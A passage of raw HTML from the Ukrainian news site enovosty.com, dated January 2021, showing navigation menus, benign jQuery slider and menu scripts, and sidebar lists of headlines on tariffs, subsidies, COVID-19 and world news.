href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li><li id="menu-item-4513417" ><a href="https://enovosty.com/tag/COVID-19">COVID-19</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news-auto/full/1301-v-ssha-pokazali-letayushhij-bespilotnyj-kadillak-video" title="В США показали летающий беспилотный Кадиллак (ВИДЕО)"><img width="210" height="156" alt="В США показали летающий беспилотный Кадиллак (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2021/01/2e51996fac38baea0d343f983562164c.jpg"></a><a href="https://enovosty.com/news-auto/full/1301-v-ssha-pokazali-letayushhij-bespilotnyj-kadillak-video" title="В США показали летающий беспилотный Кадиллак (ВИДЕО)" class="name">В США показали летающий беспилотный "Кадиллак" (ВИДЕО) <span>(3492)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/1301-v-stolice-podorozhali-otoplenie-i-goryachaya-voda" title="В столице подорожали отопление и горячая вода"><img width="210" height="156" alt="В столице подорожали отопление и горячая вода" src="https://enovosty.com/wp-content/uploads/2021/01/otoplenie_vkl.jpg"></a><a href="https://enovosty.com/news_kiev/full/1301-v-stolice-podorozhali-otoplenie-i-goryachaya-voda" title="В столице подорожали отопление и горячая вода" class="name">В столице подорожали отопление и горячая вода <span>(12788)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_society/full/1301-ukraina-zakupaet-vakcinu-sinovac-podrobnosti" title="Украина закупает вакцину Sinovac: подробности"><img width="210" height="156" alt="Украина закупает вакцину Sinovac: подробности" src="https://enovosty.com/wp-content/uploads/2021/01/125769-1_large.jpg"></a><a href="https://enovosty.com/news_society/full/1301-ukraina-zakupaet-vakcinu-sinovac-podrobnosti" title="Украина закупает вакцину Sinovac: подробности" class="name">Украина закупает вакцину Sinovac: подробности <span>(4544)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news-markets/full/1201-ceny-na-kvartiry-v-kieve-probili-novuyu-otmetku-skolko-sejchas-stoit-zhile-v-stolice" title="Цены на квартиры в Киеве пробили новую отметку. Сколько сейчас стоит жилье в столице?"><img width="210" height="156" alt="Цены на квартиры в Киеве пробили новую отметку. Сколько сейчас стоит жилье в столице?" src="https://enovosty.com/wp-content/uploads/2021/01/unnamed-5-e1610465738806.jpg"></a><a href="https://enovosty.com/news-markets/full/1201-ceny-na-kvartiry-v-kieve-probili-novuyu-otmetku-skolko-sejchas-stoit-zhile-v-stolice" title="Цены на квартиры в Киеве пробили новую отметку. Сколько сейчас стоит жилье в столице?" class="name">Цены на квартиры в Киеве пробили новую отметку. Сколько сейчас стоит жилье в столице? <span>(4264)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_economy/full/1201-morozy-na-poroge-cena-na-gaz-v-evrope-bet-rekordy-gts-ukrainy-nedozagruzhena" title="Морозы на пороге: Цена на газ в Европе бьет рекорды, ГТС Украины недозагружена"><img width="210" height="156" alt="Морозы на пороге: Цена на газ в Европе бьет рекорды, ГТС Украины недозагружена" src="https://enovosty.com/wp-content/uploads/2021/01/gts.jpg"></a><a href="https://enovosty.com/news_economy/full/1201-morozy-na-poroge-cena-na-gaz-v-evrope-bet-rekordy-gts-ukrainy-nedozagruzhena" title="Морозы на пороге: Цена на газ в Европе бьет рекорды, ГТС Украины недозагружена" class="name">Морозы на пороге: Цена на газ в Европе бьет рекорды, ГТС Украины недозагружена <span>(2336)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/zdorove/full/1201-bystrye-testy-na-covid-19-dobavili-v-paket-pervichnoj-medpomoshhi" title="Быстрые тесты на COVID-19 добавили в пакет первичной медпомощи"><img width="210" height="156" alt="Быстрые тесты на COVID-19 добавили в пакет первичной медпомощи" src="https://enovosty.com/wp-content/uploads/2021/01/image_810xs-1-e1610442214378.jpg"></a><a href="https://enovosty.com/zdorove/full/1201-bystrye-testy-na-covid-19-dobavili-v-paket-pervichnoj-medpomoshhi" title="Быстрые тесты на COVID-19 добавили в пакет первичной медпомощи" class="name">Быстрые тесты на COVID-19 добавили в пакет первичной медпомощи <span>(1772)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news_society/full/1201-v-ukraine-proxodyat-ispytaniya-neupravlyaemyx-boepripasov-dlya-bespilotnikov" title="В Украине проходят испытания неуправляемых боеприпасов для беспилотников"><img width="210" height="156" alt="В Украине проходят испытания неуправляемых боеприпасов для беспилотников" src="https://enovosty.com/wp-content/uploads/2021/01/650x492.jpg"></a><a href="https://enovosty.com/news_society/full/1201-v-ukraine-proxodyat-ispytaniya-neupravlyaemyx-boepripasov-dlya-bespilotnikov" title="В Украине проходят испытания неуправляемых боеприпасов для беспилотников" class="name">В Украине проходят испытания неуправляемых боеприпасов для беспилотников <span>(2392)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_society/full/1201-v-ukraine-uprostili-oformlenie-subsidij" title="В Украине упростили оформление субсидий"><img width="210" height="156" alt="В Украине упростили оформление субсидий" src="https://enovosty.com/wp-content/uploads/2021/01/unnamed-4.jpg"></a><a href="https://enovosty.com/news_society/full/1201-v-ukraine-uprostili-oformlenie-subsidij" title="В Украине упростили оформление субсидий" class="name">В Украине упростили оформление субсидий <span>(1396)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news_society/full/1201-v-ssha-pribyli-ukrainskie-ekipazhi-boevyx-katerov-island" title="В США прибыли украинские экипажи боевых катеров Island"><img width="210" height="156" alt="В США прибыли украинские экипажи боевых катеров Island" src="https://enovosty.com/wp-content/uploads/2021/01/1610390379-1514.jpg"></a><a href="https://enovosty.com/news_society/full/1201-v-ssha-pribyli-ukrainskie-ekipazhi-boevyx-katerov-island" title="В США прибыли украинские экипажи боевых катеров Island" class="name">В США прибыли украинские экипажи боевых катеров Island <span>(3928)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/news_society/full/1201-v-ukraine-u-pensionerov-mogut-zabirat-uzhe-naznachennye-vyplaty-podrobnosti" title="В Украине у пенсионеров могут забирать уже назначенные выплаты: подробности"><img width="210" height="156" alt="В Украине у пенсионеров могут забирать уже назначенные выплаты: подробности" src="https://enovosty.com/wp-content/uploads/2021/01/68c2b68-foto-pensii-v-ukraine-rect-2b84cbff44a16a4c5153dec1e422ccad.jpg"></a><a href="https://enovosty.com/news_society/full/1201-v-ukraine-u-pensionerov-mogut-zabirat-uzhe-naznachennye-vyplaty-podrobnosti" title="В Украине у пенсионеров могут забирать уже назначенные выплаты: подробности" class="name">В Украине у пенсионеров могут забирать уже назначенные выплаты: подробности <span>(5636)</span></a></li></ul></li><li><ul class="tact"><li id="li10" style="width:210px;"><a href="https://enovosty.com/news_society/full/1201-ukraincy-massovo-vozvrashhayutsya-na-rabotu-za-granicu" title="Украинцы массово возвращаются на работу за границу"><img width="210" height="156" alt="Украинцы массово возвращаются на работу за границу" src="https://enovosty.com/wp-content/uploads/2021/01/1508753871-4794.jpg"></a><a href="https://enovosty.com/news_society/full/1201-ukraincy-massovo-vozvrashhayutsya-na-rabotu-za-granicu" title="Украинцы массово возвращаются на работу за границу" class="name">Украинцы массово возвращаются на работу за границу <span>(1876)</span></a></li></ul></li><li><ul class="tact"><li id="li11" style="width:210px;"><a href="https://enovosty.com/news-markets/full/1201-v-ukraine-dorozhaet-elektroenergiya" title="В Украине дорожает электроэнергия"><img width="210" height="156" alt="В Украине дорожает электроэнергия" src="https://enovosty.com/wp-content/uploads/2021/01/unnamed-2.jpg"></a><a href="https://enovosty.com/news-markets/full/1201-v-ukraine-dorozhaet-elektroenergiya" title="В Украине дорожает электроэнергия" class="name">В Украине дорожает электроэнергия <span>(3268)</span></a></li></ul></li></ul></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости экономики</p></div><div class='cls'></div><span class='news_date'>13.01.2021 г.</span><br /><div class="post_news"><span id="post-4832047"><span class="postDate">20:11</span><a class="postTitle" href="https://enovosty.com/news_economy/full/1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany">Ярослав Жалило рассказал о влиянии продления усиленного карантина на экономику страны</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4832022"><span class="postDate">16:36</span><a class="postTitle" href="https://enovosty.com/news_economy/full/1301-stalo-izvestno-komu-v-ukraine-uvelichat-subsidii">Стало известно, кому в Украине увеличат субсидии</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4832017"><span class="postDate">15:58</span><a class="postTitle" href="https://enovosty.com/news_economy/full/1301-v-civilizovannyx-stranax-problemu-rezkix-skachkov-tarifov-reshayut-adresnymi-subsidiyami-artem-kompan">В цивилизованных странах проблему резких скачков тарифов решают адресными субсидиями – Артем Компан</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4832013"><span class="postDate">15:37</span><a class="postTitle" href="https://enovosty.com/news_economy/full/1301-pravitelstvo-zafiksirovalo-cenu-na-gaz-dlya-naseleniya-do-konca-otopitelnogo-sezona">Правительство зафиксировало цену на газ для населения до конца отопительного сезона</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4832012"><span class="postDate">15:25</span><a class="postTitle" href="https://enovosty.com/news_economy/full/1301-rasplata-za-pravdu-forbes-budet-nakazyvat-skazochnikov-donalda-trampa">Расплата за правду: Forbes будет наказывать "сказочников" Дональда Трампа</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4831997"><span class="postDate">14:39</span><a class="postTitle" href="https://enovosty.com/news_economy/full/1301-zaderzhka-subsidii-2021-chto-proisxodit-i-kogda-pridut-dengi">Задержка субсидии 2021: Что происходит и когда придут деньги</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4831993"><span class="postDate">14:17</span><a class="postTitle" href="https://enovosty.com/news_economy/full/1301-tarify-na-teplo-i-goryachuyu-vodu-v-kieve-ne-izmenyatsya-klichko">Тарифы на тепло и горячую воду в Киеве не изменятся, – Кличко</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_economy">Все новости экономики</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">08.01.2021</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/801-novosti-kremlya-putin-opyat-ne-uxodit">Новости Кремля: Путин опять (не) уходит...</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/801-novosti-kremlya-putin-opyat-ne-uxodit"><img width="230" alt="Новости Кремля: Путин опять (не) уходит..." src="/wp-content/uploads/2021/01/putin.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/801-novosti-kremlya-putin-opyat-ne-uxodit">Окончание ушедшего 2020 года ознаменовалось забавной суетой в Кремле и его окрестностях. Пока досужая публика пережевывала ежегодную пресс-конференцию ...</a></span></div><div class="block"><div class="info"><span class="postDate">31.12.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/2612-prognozy-politiko-ekonomicheskoj-zhizni-v-ukraine-na-2021-god-ocenki-ekspertov">Прогноз политико-экономической ситуации в Украине на 2021 год - оценки экспертов</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/2612-prognozy-politiko-ekonomicheskoj-zhizni-v-ukraine-na-2021-god-ocenki-ekspertov"><img width="230" alt="Прогноз политико-экономической ситуации в Украине на 2021 год - оценки экспертов" src="/wp-content/uploads/2020/12/4866fc56fba060727e0945f3112120de-1.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/2612-prognozy-politiko-ekonomicheskoj-zhizni-v-ukraine-na-2021-god-ocenki-ekspertov">2020 год оказался довольно тяжелым и непредсказуемым. Эпидемия коронавируса, которая распространилась по всему миру, создала новую реальность и во многом ...</a></span></div><div class="block"><div class="info"><span class="postDate">30.12.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/3012-itogi-dekabrya-boj-koronavirusu-novaya-denezhnaya-epoxa-i-zagadochnye-anomalii-vselennoj">Итоги декабря: Бой коронавирусу, новая денежная эпоха и загадочные аномалии Вселенной</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/3012-itogi-dekabrya-boj-koronavirusu-novaya-denezhnaya-epoxa-i-zagadochnye-anomalii-vselennoj"><img width="230" alt="Итоги декабря: Бой коронавирусу, новая денежная эпоха и загадочные аномалии Вселенной" src="/wp-content/uploads/2020/12/thumbnail-tw-20201205190707-4912-e1609348182755.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/3012-itogi-dekabrya-boj-koronavirusu-novaya-denezhnaya-epoxa-i-zagadochnye-anomalii-vselennoj">В мире началась масштабная вакцинация от коронавируса, который продолжает мутировать, страны встречают праздники в карантинном режиме, а на небе засияла ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>13.01.2021 г.</span><br /><div class="post_news"> <span id="post-4832047"> <span class="postDate">20:11</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany">Ярослав Жалило рассказал о влиянии продления усиленного карантина на экономику страны</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4832027"> <span class="postDate">18:16</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-lyzhnik-apokalipsisa-ili-master-klass-ot-zelenskogo-po-borbe-s-rostom-tarifov-kovidom-i-oligarxami">Лыжник апокалипсиса, или мастер-класс от Зеленского по борьбе с ростом тарифов, ковидом и олигархами</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4832024"> <span class="postDate">17:55</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/1301-foto-dnya-poklonnik-trampa-chak-norris-shturmoval-kapitolij">Фото дня: Поклонник Трампа Чак Норрис штурмовал Капитолий?</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4832023"> <span class="postDate">17:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-stalo-izvestno-kakoj-karantin-zhdyot-ukraincev">Стало известно, какой карантин ждёт украинцев</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4832022"> <span class="postDate">16:36</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1301-stalo-izvestno-komu-v-ukraine-uvelichat-subsidii">Стало известно, кому в Украине увеличат субсидии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4832021"> <span class="postDate">16:12</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-pogoda-v-ukraine-sinoptiki-rasskazali-kogda-ujdut-morozy-i-snegopady">Погода в Украине: Синоптики рассказали, когда уйдут морозы и снегопады</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4832019"> <span class="postDate">16:07</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1301-v-dele-kontrabandnoj-vip-vakcinacii-sledy-priveli-k-odioznomu-sovetniku-glavy-op-pasechniku">В деле контрабандной VIP-вакцинации следы привели к одиозному советнику главы ОП Пасечнику, - СМИ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4832014"> <span class="postDate">16:01</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1301-vozvrashhenie-navalnogo-yolkin-v-novoj-karikature-pokazal-kto-i-kak-ego-vstretit-v-rossii">Возвращение Навального: Ёлкин в новой карикатуре показал, кто и как его встретит в России</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4832017"> <span class="postDate">15:58</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1301-v-civilizovannyx-stranax-problemu-rezkix-skachkov-tarifov-reshayut-adresnymi-subsidiyami-artem-kompan">В цивилизованных странах проблему резких скачков тарифов решают адресными субсидиями – Артем Компан</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831994"> <span class="postDate">15:40</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1301-v-ssha-neizvestnye-poizdevalis-nad-lamantinom-vyrezav-na-ego-spine-slovo-tramp">В США неизвестные поиздевались над ламантином, вырезав на его спине слово "Трамп"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4832013"> <span class="postDate">15:37</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1301-pravitelstvo-zafiksirovalo-cenu-na-gaz-dlya-naseleniya-do-konca-otopitelnogo-sezona">Правительство зафиксировало цену на газ для населения до конца отопительного сезона</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4832012"> <span class="postDate">15:25</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1301-rasplata-za-pravdu-forbes-budet-nakazyvat-skazochnikov-donalda-trampa">Расплата за правду: Forbes будет наказывать "сказочников" Дональда Трампа</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4832011"> <span class="postDate">15:10</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1301-edinstvennaya-kaznennaya-v-ssha-zhenshhina-za-desyatki-let-chto-strashnogo-sovershila-liza-montgomeri">Единственная казненная в США женщина за десятки лет. Что страшного совершила Лиза Монтгомери?</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831921"> <span class="postDate">15:00</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1301-turciya-razrabotala-novyj-prototip-vertoletnogo-dvigatelya-tei-ts1400">Турция разработала новый прототип вертолетного двигателя TEI-TS1400</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4832009"> <span class="postDate">14:46</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1301-zvonkaya-opleuxa-putinu-ejdman-rasskazal-momente-istiny-dlya-rossijskoj-vlasti">Звонкая оплеуха Путину: Эйдман рассказал о моменте истины для российской власти</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831950"> <span class="postDate">14:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-opredeleny-mesta-v-ukraine-gde-est-risk-zemletryasenij">Определены места в Украине, где есть риск землетрясений</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831997"> <span class="postDate">14:39</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1301-zaderzhka-subsidii-2021-chto-proisxodit-i-kogda-pridut-dengi">Задержка субсидии 2021: Что происходит и когда придут деньги</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831992"> <span class="postDate">14:33</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1301-vakcina-shredingera-stepanova-otreagiroval-na-50-effektivnosti-vakciny-dlya-ukrainy">Вакцина Шредингера: Степанов отреагировал на 50% эффективности вакцины для Украины</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831993"> <span class="postDate">14:17</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1301-tarify-na-teplo-i-goryachuyu-vodu-v-kieve-ne-izmenyatsya-klichko">Тарифы на тепло и горячую воду в Киеве не изменятся, – Кличко</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831954"> <span class="postDate">13:40</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1301-uchenye-raskryli-tajnu-nevospriimchivosti-zhitelej-italyanskogo-ostrova-k-covid-19">Ученые раскрыли тайну невосприимчивости жителей итальянского острова к COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831938"> <span class="postDate">13:20</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-v-ukrainu-prishla-zimnyaya-skazka-goroda-zasypalo-snegom-foto">В Украину пришла зимняя сказка: города засыпало снегом (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831916"> <span class="postDate">13:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1301-vooruzhenie-prodolzhaetsya-vvs-ssha-kupyat-u-boeing-ocherednye-samolety-zapravshhiki-kc-46a">Вооружение продолжается: ВВС США купят у Boeing очередные самолеты-заправщики KC-46A</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831981"> <span class="postDate">12:59</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/1301-v-turcii-nashli-drevnij-xram">"Захватывающее и впечатляющее открытие": в Турции нашли древний храм</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831969"> <span class="postDate">12:47</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-top-7-zakonoproektov-po-didzhitalizacii-na-etot-god">Топ-7 законопроектов по диджитализации на этот год</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831936"> <span class="postDate">12:30</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1301-v-kieve-evakuator-chut-ne-zabral-mashinu-s-rebenkom-vnutri-video">В Киеве эвакуатор чуть не забрал машину с ребенком внутри (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831964"> <span class="postDate">12:26</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1301-v-ssha-pokazali-letayushhij-bespilotnyj-kadillak-video">В США показали летающий беспилотный "Кадиллак" (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831934"> <span class="postDate">12:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1301-kompaniya-youtube-na-nedelyu-zablokirovala-kanal-trampa">Компания Youtube на неделю заблокировала канал Трампа</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831958"> <span class="postDate">11:58</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1301-v-estonii-prezentovali-boevuyu-mashinu-type-x-rcv">В Эстонии презентовали боевую машину Type-X RCV (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831953"> <span class="postDate">11:28</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1301-v-indii-sobaka-kazhdyj-den-blagoslovlyaet-posetitelej-xrama">В Индии собака каждый день "благословляет" посетителей храма (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831949"> <span class="postDate">11:09</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1301-gosdep-ssha-gotovit-novye-sankcii-protiv-severnogo-potoka-2">Госдеп США готовит новые санкции против Северного потока-2</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831932"> <span class="postDate">10:54</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-v-xarkove-pensioneram-budut-besplatno-vydavat-maski-podrobnosti">В Харькове пенсионерам будут бесплатно выдавать маски: подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831929"> <span class="postDate">10:47</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-v-karpatax-slomalsya-gornolyzhnyj-podemnik-lyudej-snimali-spasateli-foto">В Карпатах сломался горнолыжный подъемник: людей снимали спасатели (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831927"> <span class="postDate">10:19</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1301-v-stolice-podorozhali-otoplenie-i-goryachaya-voda">В столице подорожали отопление и горячая вода</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831924"> <span class="postDate">09:58</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-v-stolice-vozle-supermarketa-proizoshla-silnaya-draka">В столице возле супермаркета произошла сильная драка</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831917"> <span class="postDate">09:43</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-zelenskij-priglasil-maska-posetit-ukrainskij-muzej-kosmonavtiki">Зеленский пригласил Маска посетить украинский музей космонавтики</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831914"> <span class="postDate">09:29</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-ukraina-zakupaet-vakcinu-sinovac-podrobnosti">Украина закупает вакцину Sinovac: подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831911"> <span class="postDate">08:52</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1301-v-kieve-zametili-redkij-superkar-lamborghini">В Киеве заметили редкий суперкар Lamborghini (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831908"> <span class="postDate">08:29</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1301-kim-chen-yn-prizyvaet-k-usileniyu-voennogo-potenciala-reuters">Ким Чен Ын призывает к усилению военного потенциала, - Reuters</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831906"> <span class="postDate">08:11</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1301-pens-otkazalsya-otstranyat-trampa-ot-dolzhnosti">Пенс отказался отстранять Трампа от должности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831858"> <span class="postDate">07:45</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1301-novyj-kitajskij-tank-vt4-vpervye-primenili-v-boyu">Новый китайский танк VT4 впервые применили в бою</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831855"> <span class="postDate">07:30</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-v-ukrainu-idut-morozy-kakie-regiony-zasyplet-snegom">В Украину идут морозы: какие регионы засыплет снегом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831904"> <span class="postDate">07:28</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1301-terminator-mozhet-stat-realnostyu-lyudi-ne-smogut-derzhat-pod-kontrolem-sverxrazumnyx-robotov">Терминатор может стать реальностью: люди не смогут держать под контролем сверхразумных роботов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831852"> <span class="postDate">07:15</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-poteryavshijsya-kot-vernulsya-k-svoim-xozyaevam-spustya-7-let-foto">Потерявшийся кот вернулся к своим хозяевам спустя 7 лет (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831849"> <span class="postDate">07:00</span> <a class="postTitle" 